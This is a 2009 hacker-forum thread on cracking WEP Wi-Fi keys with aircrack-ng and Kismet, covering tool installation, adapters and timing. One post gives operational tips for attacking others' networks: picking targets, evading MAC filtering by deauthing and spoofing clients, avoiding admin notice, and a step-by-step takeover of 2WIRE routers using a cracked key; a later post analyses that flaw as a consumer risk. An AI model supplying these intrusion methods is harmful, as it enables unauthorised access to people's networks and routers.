Jump to content


Photo
- - - - -

How to crack WEP like the feds, in 3 mins.


  • Please log in to reply
26 replies to this topic

#1 Bi0X

Bi0X

    H4x0r

  • Members
  • 36 posts
  • Location:England, London

Posted 02 June 2009 - 01:46 PM

Hi.

I was recently reading an article here: http://www.hellbound...-fbi-style.html
explaining how to get the WEP key for a network in 3-4 mins.

I am very interested in this, and wish to try it out on my own network. Sadly I am having some trouble using the 2 main programs mentioned in this article "Kismet" and "Aircrack".

I am using Ubuntu at the moment, and am having some slight trouble downloading these two. (Sorry, I only started with Linux a week or two ago :( )

I can probably get by without Kismet, as I know the SSID and Channel of my current network, but for me to try this out, I really need Aircrack.

Could someone please help me in downloading these programs and give any ideas which might help as I am slightly confused on some things mentioned in this article.

Thanks very much.

#2 johnnymanson

johnnymanson

    SUP3R 31337

  • Members
  • 175 posts
  • Gender:Male
  • Location:Somewhere in NC, USA

Posted 02 June 2009 - 02:21 PM

Hak5 did an episode using aircrack. It is here. http://www.hak5.org/...de-3x06-release

Maybe I watch this show too much, but I do like it!

If I remember correctly they use backtrack. It has many security tools built into a dedicated Linux distribution. This may be easier than setting it all up in Ubuntu. It can also be ran from a bootable CD or USB drive. You can learn more about Backtrack at http://www.remote-ex.../backtrack.html.

Good luck. I'm not sure you'll get it in 3 minutes unless the password is weak, bet the Feds don't either.

#3 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Country:
  • Gender:Male

Posted 02 June 2009 - 03:54 PM

How he said you can't crack a WEP in only 3 minutes!!:) but it is easy to do with any linux distro where are installed both aircrack-ng suite and kismet....if you search on google you can find a lot of tutorial that explain this attack!!;)

#4 dinscurge

dinscurge

    "I Hack, therefore, I am"

  • Members
  • 936 posts
  • Country:
  • Gender:Male
  • Location:the bunker

Posted 02 June 2009 - 06:04 PM

use apt or synaptic... e.g.
apt-get install kismet


#5 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Country:
  • Gender:Male

Posted 03 June 2009 - 12:45 PM

I think that in ubuntu repository there aren't kismet and aircrack-ng...you can check it with this simple code
sudo apt-get update /* update your repository first */

sudo apt-cache search aircrack-ng /*find any associations with "aircrack-ng" in your list */

sudo apt-get install aircrack-ng /* if you find it, you can install it with this command.. and the same procedure you can use for kismet */

;)

#6 Spyril

Spyril

    Hakker addict

  • Members
  • 588 posts
  • Location:North Dakota

Posted 03 June 2009 - 01:03 PM

Kismet and Aircrack are indeed in Ubuntu's repos. But you may as well install them from source. There's a completely new and improved version (e.g. an entire rewrite of the codebase) of Kismet that isn't in the repository yet.

#7 SchippStrich

SchippStrich

    SUP3R 31337 P1MP

  • Members
  • 293 posts
  • Country:
  • Gender:Male
  • Location:USA

Posted 03 June 2009 - 03:38 PM

Listen to Spyril

#8 AlexZ

AlexZ

    elite

  • Members
  • 114 posts
  • Country:
  • Gender:Male

Posted 04 June 2009 - 02:30 AM

Obiusly, if you follow Spyril's suggest, you can download kismet from here and aircrack-ng from here
Enjoy!;)

#9 robo_geek

robo_geek

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 01 August 2009 - 12:36 AM

How he said you can't crack a WEP in only 3 minutes!! :) but it is easy to do with any linux distro where are installed both aircrack-ng suite and kismet....if you search on google you can find a lot of tutorial that explain this attack!! ;)


I scoff when everybody says they can crack WEP in two minutes. You can on some hardware, but you can't on some others. And if there are no clients on the WLAN, you can't do a deauth attack, because you can't deauth what's not authenticated. There are a lot of 'it depends' issues.

Doing a traditional passive air-snort style WEP crack can be done quickly only on a VERY busy network, and some vendors (e.g. Cisco) implemented WEP better than others, so you can pass 45 gigs of data thru a Cisco AP running WEP and you'll get around 100 IV collisions. Without enough interesting packets, you can't crack WEP, period. As they say in the South, ya'll can't get there from here.

You can only generate enough traffic by forcing deauthentication with aireplay, but if there are no clients on the WLAN at the time, there's nothing to deauth. Now if it's a garden-variety Netgear or Symbol box, and it's got a couple of clients, that's another story, because you get plenty of IV collisions to wor with.

The real speed happens when you start forcing traffic with tools like aircrack-ptw which deals with ARP packets only. I'm not a Cisco bigot, but most of their APs are an embedded *NIX box, and these boxes can send SNMP traps alerts to your IDS console. So if somebody is deauth attacking a Cisco AP running WEP or WPA on a managed WLAN, it's gonna be setting off alarms, big time, at the console.

#10 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Country:
  • Gender:Male
  • Location:SD

Posted 01 August 2009 - 02:08 AM

The best time I have cracked 104 bit (That is 104 Bit Enc and 24 bit IV together make 128 bit, Just a recap for some) was 5 Min and 8 Sec. That is from start to finish on an untested unknown network.

I was asked to make a step by step (AKA a Script Kiddies wet dream) on cracking WEP and have produced one. Cracking WEP is not all that complicated, and the method used is explained on Aircrack's website.

Here is the Step by Step for any who need it.

This is only to be used to see how it is done.
I take no responsibility with what you do with it....
Etc, Etc.. other release of liability BS... Etc

Cracking it within 3 min, like others have stated everything needs to be perfect and have a Sh*t load of luck I guess.

I know there is a way to crack WEP in 20 Seconds, but the people need hardware (router) that Verizon FiOS gives out.
I have a mini paper written up and that sent out on how I found this security flaw, just need to find it. I wrote it and sent it a long time ago.

Well good luck with your WiFi adventures

Attached Files



#11 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,102 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 01 August 2009 - 02:16 AM

You will probably need to patch your drivers too. Also, it is possible to crack wep in minutes with the chop-chop and fragment attacks; no clients needed.. With each the longest part (if you've got two Atheros with properly patched drivers) is entering in the long ass commands. Atheros, from what I've experienced have the best patches and when one is injecting and the other capturing, WEP can be cracked in under 15min. The newest PTW brute-force algorithm will crack 104bit (128bit) WEP basically on the fly, with enough IVs (about 50K to 100K).

#12 robo_geek

robo_geek

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 03 August 2009 - 01:32 AM

The best time I have cracked 104 bit (That is 104 Bit Enc and 24 bit IV together make 128 bit, Just a recap for some) was 5 Min and 8 Sec. That is from start to finish on an untested unknown network.

I was asked to make a step by step (AKA a Script Kiddies wet dream) on cracking WEP and have produced one. Cracking WEP is not all that complicated, and the method used is explained on Aircrack's website.

Here is the Step by Step for any who need it.

This is only to be used to see how it is done.
I take no responsibility with what you do with it....
Etc, Etc.. other release of liability BS... Etc

Cracking it within 3 min, like others have stated everything needs to be perfect and have a Sh*t load of luck I guess.

I know there is a way to crack WEP in 20 Seconds, but the people need hardware (router) that Verizon FiOS gives out.
I have a mini paper written up and that sent out on how I found this security flaw, just need to find it. I wrote it and sent it a long time ago.

Well good luck with your WiFi adventures


Cool Mini paper. I will give this a shot when I get a spare minute. I admit that it's been awhile since I've cracked wep, and am itching to see how WPA/WPA2 secured devices hold up. It's interesting the work that Elcomsoft is doing with nVidia GPUs to 'recover lost WPA or WPA2 keys'.

#13 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 03 August 2009 - 05:34 AM

Nice tute, Biosphear.

I have a few notes to add:

  • First of all, in order to crack wifi, your wireless adapter must be capable of these two functions: monitor mode and packet injection. You can think of monitor mode as sort of like "hyper-promiscuous mode for wireless cards." In monitor mode you can listen to all traffic on the air from any AP or other 802.11 device within range. "Packet injection" means crafting custom packets and sending them out on the air through your wireless adapter. If your wireless adapter's chipset does not support monitor mode and packet injection, or if there's no driver or patch available that supports these features, then sorry; you're not going to be cracking wifi networks with that adapter.

    There's a limited number of chipsets with available drivers to support monitor mode and injection, but luckily most of them are extremely popular so finding one is not too difficult. All the Atheros, most Realtek and Railink, and some Broadcom chipsets are supported. In some cases a special driver is required, and sometimes it might even be necessary to apply a kernel patch :o to enable these features. If your adapter just won't work or will require a lot of trouble to get working, you can always buy an external USB wifi adapter. They're pretty cheap these days.
  • If you do need a replacement adapter, I strongly recommend the Alfa AWUS036H. Retailing at $30-45, it's a freaking bargain considering its performance over similarly-priced adapters by Linksys and Netgear.

    Posted Image

    It may be ugly, but this adapter is the wardriver's best friend. It's built on a well-supported Realtek chipset, and its 500mW transceiver provides perhaps the best range of any USB Wifi adapter. The best part is, you can plug in a high-gain replacement antenna which will take full advantage of the Alfa's performance. With a 7dBi antenna and optimum conditions, this thing can pick up networks a quarter-mile away.
  • Regarding step 4 in Biosphear's tutorial: The device ID that Linux gives to your wireless adapter may vary from device to device and from distro to distro. Sometimes you'll see "wlan0," sometimes "ath0" or "eth1." The Alfa AWUS036H (which I pimped in the paragraph above) shows up on my netbook as "wlan0" until I use airmon-ng to put it into monitor mode, whereupon a new device ID is created with the name "mon0". When you run ifconfig, it's really not too difficult to figure out which device is your ethernet and which is your wireless. Just be aware that the device IDs may not be consistent with tutorials you find on the Internets.
  • Before you start any cracking, type "sudo cd /root" and sudo mkdir a new directory called .ac-ng in your /root directory. If you do all your cracking from this directory you can keep all your stuff organized. All aircrack-ng tools must be run as root, so either sudo them or else type "sudo -s" at the start of every cracking operation to get a root prompt. (If you choose the second option, be sure to close the terminal after you're done working as root!)
  • Regarding step 7 in Biosphear's tutorial: When using airodump-ng to choose a target network to crack, look for a network with a high power (PWR) and preferably one with at least a few nodes connected. Of course, you'll want one with "WEP" specified in the encoding (ENC) column. Another good thing to look for is any network with an SSID containing "2WIRE". (More about this later ;) )
  • Once you've selected your target network, mkdir a new subdirectory inside /root/.ac-ng, name it after the target network's SSID, and cd into there before pointing airodump-ng at the target AP. This method will keep all your data organized by network and avoid having a crap-ton of .cap files piling up all over the place.
  • Make a note of the network's BSSID and also the channel it's operating on. It's a good idea to open up a text editor and copy/paste all this info into a text document, along with the MAC addresses of any hosts connected to the target network. Name this text document after the network SSID and save it in the /root/.ac-ng/<target network SSID> directory. Go back to the terminal and hit Ctrl-C to quit airodump-ng. When you restart it, make sure to specify both the BSSID ("-b") and the channel ("-c") of the target AP, and don't forget to add "-w" followed by the filename you want to write the file to (you might want to use the target network's SSID for this as well).
  • Between steps 9 and 10, it's important to recognize whether the target AP is filtering clients by MAC address. If the target is set up for MAC filtering, then you'll need to use a slightly different approach to crack the network. When you run your fakeauth, if you're able to connect OK, then you know MAC filtering is not enabled and you can proceed as described in Biosphear's tutorial. If, however, you start receiving deauth packets then that's a good sign that MAC filtering is enabled on the AP.

    If you're getting filtered out by MAC address, then you'll need to see some connected hosts in order to attack the network. If another host is connected to the network, you can run a deauth attack against that host (specify its MAC address) and then fakeauth using its MAC address in place of your own. It's important to remember that deauth attacks against a connected host will bump that host offline. Because deauth attacks tend to be 'noisy,' you should keep them to a minimum. If people on the target network keep getting repeatedly knocked offline, they'll probably realize there's something wrong with the router and you might gain the attention of a network admin. A stealthier approach in the case of MAC addy filtering is to bide your time: make a log of all the client MAC addresses connected to the target AP, then try again at a time of day when there's little or no traffic. Find a MAC address on your list which is not connected, then carry out your dissociation/ARP replay attacks under the guise of that trusted client.

  • Finally, a (hopefully) useful bit of information: Due to a ridiculously stupid "ease-of-use" feature, many 2WIRE routers have a vulnerability that allows anyone who cracks the WEP key to easily gain full administrative access to the router (2WIRE wifi routers are standard equipment on AT&T, Bellsouth and Qwest home DSL networks, BTW). After cracking the WEP key of a 2WIRE router, you can easily gain admin access by the following method:


    1. Connect to the network using the cracked WEP key you acquired from aircrack-ng.

    2. Open a browser window and type the IP address of the 2WIRE router in the address bar. This should not be too hard to guess. For routers on AT&T service it will most likely be 192.168.1.254, but other companies might use different numbers. As usual, Google is your friend here.

    3. When you get to the router setup login page, click the link for "I forgot my password."

    4. The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

    5. You're in.

Now you can change any admin settings you please. If the router is filtering by MAC address, this would be a prime opportunity to add your own MAC address (spoofed, of course!) to the whitelist.

I don't know if this works on all 2WIRE routers, but it seems to work on quite a lot of them.
As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Edited by Colonel Panic, 03 August 2009 - 05:06 PM.


#14 zandi

zandi

    SUP3R 31337 P1MP

  • Members
  • 263 posts
  • Location:michigan

Posted 03 August 2009 - 11:38 AM

it's been a while since i've done any WEP cracking, i'll have to set up my fon and mess around with it.

but one thing, first. it seems that after I run kismet I can't get my wireless interface back in working order. i've got to run and take care of some stuff, but iirc, it just stays in monitor mode and won't come back out. any idea on how to fix this without having to reboot the machine?

#15 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 03 August 2009 - 02:19 PM

Have you tried:

airmon-ng stop <device ID of your wireless adapter> ?

Edited by Colonel Panic, 03 August 2009 - 02:23 PM.


#16 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Country:
  • Gender:Male
  • Location:SD

Posted 04 August 2009 - 01:55 AM

Nice tute, Biosphear.

Thank You :D

My step by step does assume a few things.

One:
You are root

Two:
You are using a supported WiFi card that can do both monitor mode and packet injection

Three:
The device you are trying to get into does not filter MACs

Four:
You do not have to mkdir, it will save to your root drive, but if you do want to keep it neat you can do that (mine is just if you are doing one crack, so you have only 3 files to deal with)

Five:
You own the router (Your method seems to be more on the black hat side, mine is so people can have a simple step by step to see how WEP cracking can be done)

Six:

The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

I think the number printed on the label on the bottom is the WEP Key.

Seven:

As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Should of put that first

Good add ons to my file though CP. :D

I have a few more Step by Steps that I may have you look over, to make it easier to understand. They all work I and others test them, they just do not break it down as much. I have others Step by Steps that do that but they do that on a technical level not a user level.

Thanks for the input.

biosphear

Edited by biosphear, 04 August 2009 - 01:56 AM.


#17 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 04 August 2009 - 06:57 AM

My step by step does assume a few things.

One:
You are root

Two:
You are using a supported WiFi card that can do both monitor mode and packet injection

Three:
The device you are trying to get into does not filter MACs

Four:
You do not have to mkdir, it will save to your root drive, but if you do want to keep it neat you can do that (mine is just if you are doing one crack, so you have only 3 files to deal with)

Five:
You own the router (Your method seems to be more on the black hat side, mine is so people can have a simple step by step to see how WEP cracking can be done)

I tried to keep it neutral-sounding, but I guess the methodology implies that one would be cracking lots of routers and would therefore need to keep all one's cracking sessions organized.

If a "black hat" hacker was cracking lots of routers illegally, it would be unwise to retain all the data pertaining to numerous hacks right there on his hard drive for authorities to find (even if it is inside an obscurely-named hidden directory within /root). For a black-hat, it would be wiser to destroy all the incriminating data right after the crack is done.

Of course if a pen tester was legitimately hired to do security analysis of a company and he was profiling wireless vulnerabilities, he would certainly want to retain all the relevant data in an organized fashion.

Six:


The next page will have a text field with instructions to enter a number printed on a label on the bottom of the router. Instead, just enter the cracked WEP key you just used to log on to the network (the same one you acquired from aircrack-ng).

I think the number printed on the label on the bottom is the WEP Key.

It might be the original WEP key, but I have tried this out on my parents' 2WIRE DSL modem/router (my father had deliberately changed the security settings) and the new WEP key unlocked the router.

Seven:


As always, this info is provided purely for educational purposes and should in no way be construed as encouragement or endorsement to fuck with other people's belongings without permission. OK?

Should of put that first

^_^

Good add ons to my file though CP. :D

Thanks

I have a few more Step by Steps that I may have you look over, to make it easier to understand. They all work I and others test them, they just do not break it down as much. I have others Step by Steps that do that but they do that on a technical level not a user level.

Thanks for the input.

biosphear

You're welcome.

Maybe we could cobble all this together into an explicit tutorial and upload it to DocDroppers?

Edited by Colonel Panic, 04 August 2009 - 07:06 AM.


#18 biosphear

biosphear

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 327 posts
  • Country:
  • Gender:Male
  • Location:SD

Posted 04 August 2009 - 01:01 PM

Maybe we could cobble all this together into an explicit tutorial and upload it to DocDroppers?


Sounds good.
I have a few others that I have finished, and a 50 or so page (as it is looking like so far) on owning your first box step by step form getting into the network to garbing what you want off that system.
I'm also working on a more advance (I mean about 100 time more) then my Owning your first box on how to get pass network security messieurs.

PM me and lets see what we can get together :)

#19 Colonel Panic

Colonel Panic

    Hakker addict

  • Members
  • 607 posts
  • Gender:Male
  • Location:IN YR BROWSER, SAYIN SUM SHIT

Posted 12 August 2009 - 02:14 PM

I think the number printed on the label on the bottom is the WEP Key.

It might be the original WEP key, but I have tried this out on my parents' 2WIRE DSL modem/router (my father had deliberately changed the security settings) and the new WEP key unlocked the router.

Last weekend I did a little more poking around with my parents' DSL modem/router (a 2WIRE from AT&T) and it appears you're right.

How it works is this: The device ships with WEP enabled and a pre-set, good quality cryptographic key in place. That default WEP key is printed on a label adhered to the bottom of the router, along with the device's MAC addy and serial number. That original, default WEP key is used by the router as an alternative to an admin login in the event of a lost password.

Changing the WEP key is indeed possible, as is changing the security settings to use WPA and WPA2, but AT&T does not routinely provide its customers with any hard-copy documentation on how to change the admin settings of the device. Therefore, most users seem to have no idea that it's even possible, judging by the vast majority of 2WIRE routers "in the field" operating on WEP security with a default key. If the WEP key is changed by the owner, then a cracking attempt will reveal to the attacker the new WEP key and not the default, so administrative access to the router will not be as easily obtained.

Regardless, this is a really bad situation for AT&T DSL users, for several reasons:

  • If the default WEP key is not changed by the end-user, an attacker can easily gain administrative access to the router, and thereby the entire LAN. AT&T's installation and setup guide does not explain how to change the router's WEP key, and the DSL modem/router does not come with a user's manual.
  • Shipping routers with WEP enabled by default promotes a false sense of security to end-users, creating the impression that they're protected when in fact their entire network is up for grabs.
  • Even if the user does understand that WEP is inadequate, AT&T does not provide any instructions for how to change the security settings of the device without the user logging into his or her AT&T Broadband Web site and seeking out the 2WIRE router user's manual.
  • Enabling WPA-PSK security instead of WEP would not only provide better security against bandwidth stealing, but would also prevent wifi crackers from obtaining administrative access to the router. However, this information is not provided up-front by AT&T to its customers at the time of installation.
  • Even changing the WEP key to something other than the default (while not providing good security against bandwidth stealing) would at least help prevent attackers from obtaining administrative access to the router, but again this information is not provided up-front by AT&T to its customers at the time of installation.

This is another example of user security being sacrificed for ease-of-use. This is unfortunately common practice these days, as manufacturers and service providers dumb down their products' documentation and user interfaces in the interest of lowering their own tech support costs.

Edited by Colonel Panic, 13 August 2009 - 05:07 AM.


#20 Skunkworks

Skunkworks

    mad 1337

  • Members
  • 130 posts
  • Location:-36.566^2

Posted 29 August 2009 - 11:49 PM

Heh, funny this came up.

I recently did an entire walkthough of just how insecure WEP is for a 4H computer competition and ended up winning...

And 3-4 minutes is nothing, in my demo I got past my test network's 64-bit WEP in a little over 1:30!




BinRev is hosted by the great people at Lunarpages!